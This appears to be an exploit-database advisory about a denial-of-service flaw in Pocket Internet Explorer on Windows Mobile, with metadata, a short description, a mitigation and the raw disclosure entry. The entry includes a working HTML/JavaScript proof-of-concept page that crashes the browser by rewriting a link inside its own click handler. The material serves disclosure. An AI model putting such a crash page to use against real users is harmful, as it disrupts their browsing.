Denial of Service Vulnerability in Pocket Internet Explorer (PIE)

vendor:

Pocket Internet Explorer

by:

SecurityFocus

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Pocket Internet Explorer

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Mobile

2002

Denial of Service Vulnerability in Pocket Internet Explorer (PIE)

A denial of service vulnerability has been reported for Pocket Internet Explorer (PIE). The vulnerability is due to the way some JavaScript code is interpreted by PIE. By enticing a victim user to browse a maliciously crafted web page an attacker can cause PIE to crash.

Mitigation:

Ensure that all users are running the latest version of Pocket Internet Explorer.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6507/info

A denial of service vulnerability has been reported for Pocket Internet Explorer (PIE). The vulnerability is due to the way some JavaScript code is interpreted by PIE.

By enticing a victim user to browse a maliciously crafted web page an attacker can cause PIE to crash. 

<html> <head>
<script language="Javascript">
function displayPage(page){
if(page=="onload"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash
me</a>";}
if(page=="crash"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">crash!</a>";}
}
</script> </head>
<body onLoad="displayPage('onload');"> <hr> <span id="main"></span> </body> </html>